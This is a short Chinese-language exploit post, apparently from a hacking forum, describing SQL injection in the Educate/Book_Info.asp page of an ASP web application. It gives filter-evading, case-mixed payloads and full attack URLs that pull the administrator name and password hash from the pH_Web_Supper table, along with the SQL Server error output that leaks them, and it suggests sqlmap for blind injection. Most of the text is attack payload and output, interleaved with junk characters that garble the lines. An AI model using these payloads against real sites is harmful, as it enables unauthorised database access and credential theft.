漏洞出现在Educate/Book_Info.asp . \ M: f) G/ ^+ H) `7 h
& G" d, z9 |8 J* y( v1 K此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出- x) \9 p5 D/ V Y
* [- U% `$ F& Z+ V3 Q
exp:如下
% z; O+ \4 `, H9 ~! ^4 s, o查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
! S8 }5 K; j6 a2 L% U: B查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
* b( D5 |- E7 P0 J - f/ K2 D. A2 _
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)( V, j5 a2 |# A" g
0 W% F2 s' j6 X
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'7 P1 R0 _% T: W4 x7 T/ E! s/ _' ^
6 `8 Y4 d/ m+ ]3 I% v将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。/ [) \5 p1 i q3 ?5 J' y: ?/ J
- I# A$ j5 k2 `' x5 s, {3 d& X/Educate/Book_Info.asp,行 8
" b$ C$ F2 T" P 2 q$ U0 q+ M- `* T
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
+ T" z+ k$ D/ z3 \( N. A
/ i! f' Q. ]2 D# N- `$ P% v: ]Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
* m$ ~% B: }% E8 ~, F 8 n/ q9 V( }. [' c5 k: ?" H+ L* y
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。+ h* P; ]/ l$ c0 W
" S; f% D$ W) [. m
/Educate/Book_Info.asp,行 8
0 v, c2 l3 H6 q- r( ^ x# \ |